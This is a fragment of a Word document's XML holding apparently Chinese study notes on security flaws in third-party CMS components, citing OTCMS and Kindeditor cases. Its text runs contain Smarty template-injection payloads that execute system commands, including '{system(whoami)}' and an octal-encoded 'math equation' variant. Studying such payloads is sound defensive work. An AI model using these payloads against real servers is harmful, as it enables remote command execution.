          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);function 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}{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function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string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:{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$smarty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template_object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smarty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_getSmartyObj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display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'string:{system(whoami)}'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)}</w:t>
      </w:r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eval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:{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math equation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'("\163\171\163\164\145\155")("\167\150\157\141\155\151")'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br/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、插件组件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编辑器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邮箱，图片处理等（见上图）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使用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//www.cnblogs.com/qq350760546/p/6669112.html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//www.cnblogs.com/linglinglingling/p/18040866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//blog.csdn.net/weixin_58099903/article/details/125810825</w:t>
      </w:r>
      <w:r>
        <w:br/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、案例：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CMS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由第三方应用引用导致安全问题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网钛（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OTCMS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//xz.aliyun.com/t/13432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Kindeditor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//www.cnblogs.com/TaoLeonis/p/14899198.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58516540" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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6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5FD4C219" w14:textId="77777777" w:rsidR="00086C0F" w:rsidRPr="00000686" w:rsidRDefault="00086C0F"/>
    <w:sectPr w:rsidR="00086C0F" w:rsidRPr="00000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32940"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C50C9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D8"/>
    <w:rsid w:val="00000686"/>
    <w:rsid w:val="00086C0F"/>
    <w:rsid w:val="0027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237F4-8003-4D07-BA11-0920ACA7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686"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr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000686"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线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0006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00068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00686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006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9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qq.com/doc/DQ3Z6RkNpaUtMcEF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2025-01-06T01:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-06T01:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>